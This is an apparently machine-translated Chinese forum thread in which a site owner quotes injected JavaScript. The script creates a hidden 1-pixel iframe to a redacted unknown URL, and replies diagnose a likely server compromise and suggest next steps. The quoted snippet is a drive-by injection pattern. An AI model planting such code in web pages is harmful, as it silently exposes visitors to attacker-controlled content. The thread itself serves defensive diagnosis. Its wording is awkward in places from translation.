我今天login到我的服务器,并在我的目录浏览窗口的顶部看到以下无法识别的代码:
document.writeln(“”); var el = document.createElement(“iframe”); document.body.appendChild(el); el.id ='myname'; el.name ='myname'; el.style.width =“1px”; el.style.height =“1px”; el.scrolling =“auto”; el.frameBorder =“0”; el.src =“[作者编辑,未知url在这里]”;
我不认识的URL(我已经编辑出)。
此外,我的phpBB3留言板在顶部有一些phpBBdebugging和PHP通知,这些对我来说都是新的。 此外,论坛代码中的一些链接似乎已经被垃圾字符破坏了。
没有额外的内容被添加或删除,但这引起了我的一个主要关注。
我网站上的每个页面都受到Apachelogin提示的保护,我认为这是足够的保护。
我受到过攻击,还是在阴影中跳跃?
不幸的是,一个来自神秘URL的iframe加载内容几乎肯定是妥协的指示。
需要专家进行非常彻底的调查才能发现违规的程度,但是像这样的代码的修改意味着设备完全被破坏。 至于下一步该做什么,请在这里阅读。
你最有可能遭到袭击。 尝试谷歌谷歌代码片段。 下一步是确定他们是否注入了代码或者是否是一个显示你的FTP密码的木马。 运行一个ip查找 ,看看黑客居住在哪里(除非被代理隐藏),上次发生在我身上的事实certificate,我在我的城市的一个网吧显示我的密码,所以在你改变你的安全之前,确保它没有不会从你的本地机器受到威胁